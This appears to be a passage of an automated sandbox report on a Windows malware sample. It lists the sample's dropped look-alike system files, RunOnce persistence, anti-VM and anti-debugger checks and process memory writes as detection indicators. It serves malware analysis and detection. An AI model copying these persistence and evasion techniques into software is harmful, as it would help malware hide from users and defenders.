                      Source: explorer.exe.0.drStatic PE information: real checksum: 0x4bf451a should be: 0xbbfaf
                      Source: spoolsv.exe.2.drStatic PE information: real checksum: 0x4bf451a should be: 0xbc9ee
                      Source: svchost.exe.3.drStatic PE information: real checksum: 0x4bf451a should be: 0xc0dbd
                      Source: file.exeStatic PE information: real checksum: 0x4bf451a should be: 0xc8d54
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7A4F9 push ebp; iretd 0_3_02D7A508
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D8268F push 0000003Eh; ret 0_3_02D826B9
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D81110 push edi; ret 0_3_02D81131
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D80B00 push 0000003Eh; ret 0_3_02D80B21
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7C03D push edx; ret 0_3_02D7C041
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D791C2 push edx; ret 0_3_02D791D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D791C2 push edx; ret 0_3_02D791D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D791C2 push edx; ret 0_3_02D791D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D791C2 push edx; ret 0_3_02D791D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D793A2 push 0000003Eh; ret 0_3_02D793AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D793A2 push 0000003Eh; ret 0_3_02D793AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D793A2 push 0000003Eh; ret 0_3_02D793AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D793A2 push 0000003Eh; ret 0_3_02D793AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D791C2 push edx; ret 0_3_02D791D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D791C2 push edx; ret 0_3_02D791D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D791C2 push edx; ret 0_3_02D791D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D791C2 push edx; ret 0_3_02D791D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D793A2 push 0000003Eh; ret 0_3_02D793AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D793A2 push 0000003Eh; ret 0_3_02D793AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D793A2 push 0000003Eh; ret 0_3_02D793AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D793A2 push 0000003Eh; ret 0_3_02D793AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_02D7921B push ebp; iretd 0_3_02D79230
                      Source: file.exeStatic PE information: section name: entropy: 7.851401794337924
                      Source: file.exeStatic PE information: section name: .data entropy: 7.939460972036294
                      Source: explorer.exe.0.drStatic PE information: section name: entropy: 7.851401794337924
                      Source: explorer.exe.0.drStatic PE information: section name: .data entropy: 7.939460972036294
                      Source: spoolsv.exe.2.drStatic PE information: section name: entropy: 7.851401794337924
                      Source: spoolsv.exe.2.drStatic PE information: section name: .data entropy: 7.939460972036294
                      Source: svchost.exe.3.drStatic PE information: section name: entropy: 7.851401794337924
                      Source: svchost.exe.3.drStatic PE information: section name: .data entropy: 7.939460972036294

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exeExecutable created and started: c:\windows\resources\themes\explorer.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeExecutable created and started: c:\windows\resources\svchost.exeJump to behavior
                      Source: C:\Windows\Resources\svchost.exeExecutable created and started: c:\windows\resources\spoolsv.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                      Source: C:\Windows\Resources\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004289D6 IsIconic,0_2_004289D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004289D6 IsIconic,0_2_004289D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004289D6 IsIconic,0_2_004289D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004289D6 IsIconic,0_2_004289D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004289D6 IsIconic,3_2_004289D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004289D6 IsIconic,3_2_004289D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004289D6 IsIconic,3_2_004289D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004289D6 IsIconic,3_2_004289D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CF34C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004CF34C
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A5C sgdt fword ptr [eax]0_2_00403A5C
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 1149Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 1704Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 361Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 6522Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: foregroundWindowGot 1454Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 6725Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 537Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 1641Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: foregroundWindowGot 1017Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 926Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.6 %
                      Source: C:\Windows\Resources\spoolsv.exeAPI coverage: 4.2 %
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 6768Thread sleep count: 1149 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 6488Thread sleep count: 1704 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 6488Thread sleep time: -1704000s >= -30000sJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 6768Thread sleep count: 361 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 6488Thread sleep count: 6522 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 6488Thread sleep time: -6522000s >= -30000sJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exe TID: 5560Thread sleep count: 136 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 1264Thread sleep count: 251 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 7160Thread sleep count: 6725 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 7160Thread sleep time: -6725000s >= -30000sJump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 1264Thread sleep count: 537 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 1264Thread sleep count: 139 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 7160Thread sleep count: 1641 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 7160Thread sleep time: -1641000s >= -30000sJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 1896Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 1896Thread sleep count: 926 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042806E GetLogicalDriveStringsW,0_2_0042806E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004280EE GetSystemInfo,0_2_004280EE
                      Source: svchost.exe, 0000000D.00000002.2383521769.0000000000421000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: VBoxService.exe
                      Source: file.exe, file.exe, 00000000.00000003.2059845376.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, explorer.exe, 00000002.00000003.2084070518.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, spoolsv.exe, 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000003.00000003.2095587943.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2113766529.0000000003140000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2132597386.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2174500522.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000A.00000003.2282489300.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2310054237.0000000000539000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                      Source: explorer.exe, 00000002.00000003.2299766057.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2457246476.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2369527153.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2476922152.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2788018051.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2578341036.0000000000A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000D.00000002.2383521769.0000000000421000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: VMWare
                      Source: explorer.exe, 00000002.00000003.2606273000.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2917955263.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2804919705.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2558426084.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2643745790.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2778130316.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2899779963.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2205277483.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2674296786.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2226018783.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2934542003.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
                      Source: file.exe, 00000000.00000003.2059845376.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, explorer.exe, 00000002.00000003.2084070518.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000003.00000003.2095587943.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2113766529.0000000003140000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2132597386.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2174500522.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000A.00000003.2282489300.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2310054237.0000000000539000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000D.00000003.2354977756.0000000002F40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                      Source: file.exe, 00000000.00000003.2059845376.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, explorer.exe, 00000002.00000003.2084070518.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000003.00000003.2095587943.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2113766529.0000000003140000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2132597386.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2174500522.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000A.00000003.2282489300.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2310054237.0000000000539000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000D.00000003.2354977756.0000000002F40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: JwaWinBase]DLL_Loader_VirtualMachine(Win32Typesh
                      Source: svchost.exe, 0000000D.00000002.2383521769.0000000000421000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: VBoxService.exeU
                      Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-24686
                      Source: C:\Windows\Resources\spoolsv.exeAPI call chain: ExitProcess graph end nodegraph_3-24962
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Resources\svchost.exeOpen window title or class name: ollydbg
                      Source: C:\Windows\Resources\svchost.exeFile opened: SIWDEBUG
                      Source: C:\Windows\Resources\svchost.exeFile opened: NTICE
                      Source: C:\Windows\Resources\svchost.exeFile opened: SICE

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 108.177.15.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 74.125.206.82 80Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 6208 base: 1C0000 value: 00Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 6208 base: 2D02D8 value: 00Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 6208 base: 2D11E8 value: 00Jump to behavior
                      Source: C:\Windows\System32\consent.exeMemory written: C:\Windows\System32\svchost.exe base: 34124FE828Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" ROJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 5152 322 0000013E5E228840Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" ROJump to behavior
                      Source: explorer.exe, 00000002.00000003.2804919705.0000000000A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerE
                      Source: explorer.exe, 00000002.00000003.2344113748.0000000000A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerr{
                      Source: explorer.exe, 00000002.00000003.2271309412.0000000000A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmant6mainI}
                      Source: explorer.exe, 00000002.00000003.2558426084.0000000000A15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanIME
